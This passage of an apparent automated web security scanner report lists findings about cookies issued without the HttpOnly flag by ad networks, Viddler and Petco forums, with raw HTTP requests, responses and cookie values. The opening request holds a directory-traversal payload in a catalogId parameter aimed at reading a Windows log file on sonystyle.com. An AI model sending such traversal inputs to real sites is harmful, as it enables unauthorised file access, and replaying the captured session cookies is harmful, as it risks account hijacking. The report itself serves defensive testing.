TS5bbf46=3db1ba839d4ab4460b40b09474a1c3f6206beaca595313e04dd043ac60ac0ec52b19fcf2529ede9f9292d5aa; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=../../../../../../../../../../windows/iis6.log HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.sonystyle.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
ntCoent-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:20:44 GMT
Connection: close
Set-Cookie: JSESSIONID=0000hwdv8kzP3OiBtLlip819BWg:14aelsv3e; Path=/
Set-Cookie: WC_PERSISTENT=n0FjwS6r5pu94CCixcDypwq3x3Y%3d%0a%3b2011%2d05%2d15+17%3a20%3a44%2e489%5f1305494444490%2d66937%5f0; Expires=Fri, 11 Nov 2011 21:20:44 GMT; Path=/
Set-Cookie: TS5bbf46=3db1ba839d4ab4460b40b09474a1c3f6206beaca595313e04dd043ac60ac0ec52b19fcf2529ede9f9292d5aa; Path=/
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...

16.24. http://www.viddler.com/thumbnail/7d63c65a/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.viddler.com
Path:	/thumbnail/7d63c65a/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8D6233A47F715A3B52BD9622BD2831C1.viddler_d; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thumbnail/7d63c65a/ HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: text/plain
Connection: keep-alive
X-Viddler-Node: viddler_d
Set-Cookie: JSESSIONID=8D6233A47F715A3B52BD9622BD2831C1.viddler_d; Path=/
Location: http://cdn-thumbs.viddler.com/thumbnail_2_7d63c65a_v2.jpg
Content-Length: 0

16.25. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=amnufry4Zaw4nA9MAJUn8HsyIZbs5xMakDHiWt3ZavEhW6TLUwKvSTU5dNOf7Tjig6vTvXsrZdEJ71ZdZdnTrWMiyHS7ZayZdhWacXvp7Yw8e4vj; path=/; domain=.tribalfusion.com; expires=Sat, 13-Aug-2011 21:30:57 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.26. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.27. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
adImpCount=z8H5DIFkJMaR8Ed5F-227NZjh3y-rcMW04k_wbW9O0UpagDPKKctVczI9DEFcEkP4SDJo80wBimsrZzphev9io1NrxolS3YNP6BCNWbNMKERTUDkfjOHZfLNt9GGTnw4O5DlS8Xp0DD0cZiQf18CU1rocxY7nE-F4z9lkwlZYJmyKyuZekSrBs8bFOGeiOzayOqtjqJUs1trCEbZqAdtWw; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
fc=VBzn51JQz0zltCfNSC7f2diNYkWtlxDZmnwtgj7m71awBKgjtjPFRrKyS70pSqF5M1teNC2VYwZFniwNP2T0Fr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
pf=_ueUnCc1-Qecqj3JV1mSQXt8U7koKOu226ju1sLmLj8NE6qDfV8NEBcnTK27A9VWCoQ27uEq-jG8qUjaqeGSQcTUowLuhfuR4YEKOy3c8ZHFvEIZFcaT9sTwHmEL6Z6P6fmPZnJfwJhzzO6E35ZJTCuxdvuaAUa6ZYmQOOWX4Ivvjejc8x_DoS2zqjDa34YxxYOzH-FsCNNOyyJfH-npNT1r1jk-eJ1M0AYv01y1P5pSsnil0SgAGJf16SQF0ZiST-FpBVOv8U8Yc4TghjCD5heht3ivBnz3hwow8XaUE6U; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.28. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:49 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3211269308389544143&fpid=1&nu=n&t=
...[SNIP]...

16.29. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=728x90&s=1565884&_salt=3199842828&B=10&r=0&SIG=10vppft4v;x-cookie=rqa6d5q6g078o&o=4&f=x0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; bh="b!!!!8!!Kc5!!!!#=!Y*a!!Z+p!!!!#=!c8X!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!#*Xa!!!!#=!dNx!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#M1G!!!!#=!c8A!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#b?y!!!!#=!dNx!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z"

Response

16.30. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!!a!!Zwa!!!!#=!DU4!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*Xc!!!!#=!07,!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!$=!gBH!#3pv!!!!$=!gBH!#5(W!!!!#=!07,!#5(Y!!!!$=!gBH!#5(_!!!!#=!07,!#5(a!!!!$=!gBH!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<e!!!!$=!gBH!#b<g!!!!$=!gBH!#b<i!!!!$=!gBH!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!$=!gBH!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; path=/; expires=Tue, 14-May-2013 21:31:01 GMT
BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=744660&id=1056954&id=1056958&id=736147&id=736181&id=744653&id=1056979&id=1056956&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!Y!!Zwa!!!!#=!DU4!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*Xc!!!!#=!07,!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#5(W!!!!#=!07,!#5(_!!!!#=!07,!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#QfM~~!#T?O!!!!#=!dO*!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 21:31:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!a!!Zwa!!!!#=!DU4!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*Xc!!!!#=!07,!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!$=!gBH!#3pv!!!!$=!gBH!#5(W!!!!#=!07,!#5(Y!!!!$=!gBH!#5(_!!!!#=!07,!#5(a!!!!$=!gBH!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<e!!!!$=!gBH!#b<g!!!!$=!gBH!#b<i!!!!$=!gBH!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!$=!gBH!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; path=/; expires=Tue, 14-May-2013 21:31:01 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=RzLbCNmv5gEQq5e67QM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Sun, 15 May 2011 21:31:01 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

16.31. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_c7op="MLuBMx5WwltEVdJC1pDHXxVVQRFSxZB5VVzGA0eXFxQcE0JTcx0dirKNGop7K60NupMwPoi6rdLtmydkXXg0gitVkUe26E7B1wipX+vyz/MUyAh64f3weMIrGKJFcvdFkw39C3qx4sWW1ypxTDJMNgU1KkS+jVgIJFENEgUuRn79xfSJ5fz/1O7RmfXJ0PqBwv3R+PX0sejgmfXtzqvv9PJAFXEFDxEUFWnexeyz4erZpdno4ovl6qXb5Nb8/bvF8+CBwvzSmcL3/fZb7PkyM0of0XMcQHFvuQkjzA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMd5U+nfxIYLl18ZFrLI+JK2N4xaINkOV/MW2kt17b/HYOWgNCOJdT/cRHL6SujQ/U1MkjbzS/9Xo8c/nkc7A9gYF1T138FFPd84qYXFdfW8OktqEMQqq6EH7oUZnHv+txHi3CtGdRYH/BJWE9KeR0JpoBVQbG0SkWeRDthOpMIUsAqButGokk4HUz6miBWWTHJwiKTP5AQBe/UFH2fD2Sdx1aOU+9/9PuE0K3y4WLrYt4a7uXOxhbeEc/Y7FrFLX2kKc3sz4tQg1PvLTtEmvAmNqsQ97GZyqs2jq4yo2btb91v76B/kBu9qxX3TKrWJ2Dg3LThsz2IvLzYT3YotatnKFpm551fsjZAvkRnN0s+fNhPDb5b9qOF64fWv1LX12U2D2WLccuIizc9h3cFUHFhXAKOFWIGsKrxhzoAYRKxtmawpu4UJXkEF0rQS7HRTuN4G7mnCfcrUoX/iS3soaj1D4ACHImZXhx2FT0bb4oQBPezZJQgrIG/xslWiup/hvjD62ZujFBoorZ4N/s5bxSRGjYLZuzVz16dw1RO4fO3vtsZNBiqqh+bDV0xTBqoLLq3zTfPzDmucnr9XFMYP4lEWzZhAtZOmsZdHVh0uckbPq56oRv0YSX3TqozJ6SdPhycfyPqiTofuk/3VRabYxNEdb6NELU4ALKcOMaCiEDCiaOafFmZ+ouCdp0E/6Y8C1Hn80iuHHJ0pFL/5z4+9ubUck+RCuPYqxQ5M0m5fPvaSjH9FJKeWm7Ue7nduSxHvpoyrDSROUIcJQPc8ieY24I7W3pRGeoJKvy5TgV2kcPDuOaS/IKHmHqNZKdXwzuZsD8tAL3A02fG3/n0JEbxXjitt8b69eKaXkVznUFqYSy2zV87"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.32. http://adserver.veruta.com/track.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/track.fcgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;
cmid=20772879917; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.33. http://ak1.abmr.net/is/images3.pacsun.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/images3.pacsun.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-0668EB3294B3EE177948E12CB22A0A15F5355C2AAF43E1502DB89627D85FEA5B-87E9273CAC7B24CCAA1B06AE9455ECC3E23DC786C869DBB120B0C02D71BA2C7F; expires=Tue, 15-May-2012 01:43:57 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.34. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-0F97FF17A6C7B76FA80D7B5FC53051411FACF43F4A7F7A11B6662C7605FF5D2C-626242034CBFD7FF34701BF891A77CB52F1D124F418A9D21DDABD5526325DD81; expires=Tue, 15-May-2012 01:19:52 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.35. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-8AFA4574C23C4E3E5689B61278CBEE7678E90262F44DBB0B16496D3104A4A06A-CE394B828D8586C238B09B24322432CAF393340623CB22B7D8AEB9FEE9D60071; expires=Tue, 15-May-2012 01:19:51 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.36. http://ak1.abmr.net/is/www.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.imiclk.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-5E66A717ADC4DD76B5758705389CCD2635275772D1D7A73AE679432994318A7C-93C51AAF40ABAF3BCF92DC0A8EBD07AE0472D13E24B0BF7F40C475410F3E68C9; expires=Tue, 15-May-2012 01:42:58 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.37. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.apnewsregistry.com
Path:	/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uciv1=2ec34539-fad4-4d8a-8818-26ab2d9b777e; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.38. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7278cea-24.143.206.58-1297260492; expires=Tue, 14-May-2013 21:31:00 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.39. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:20:47 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.40. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:19:51 GMT; Path=/
pb_rtb_ev=1:531292.AG-00000001389358554.0; Domain=.contextweb.com; Expires=Tue, 15-May-2012 01:19:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.41. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PI=h1145373Za940831Zc305003603,305003603Zs611Zt1135;expires=Wed, 15 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.42. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Bird_Discussion_Forum/fd03p00v06d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Bird_Discussion_Forum/fd03p00v06d1?widgetId=PTWidget17&cdsn=562&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:43:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:43:42 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:43:41 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2407

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget17', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

16.43. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget12&cdsn=810&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
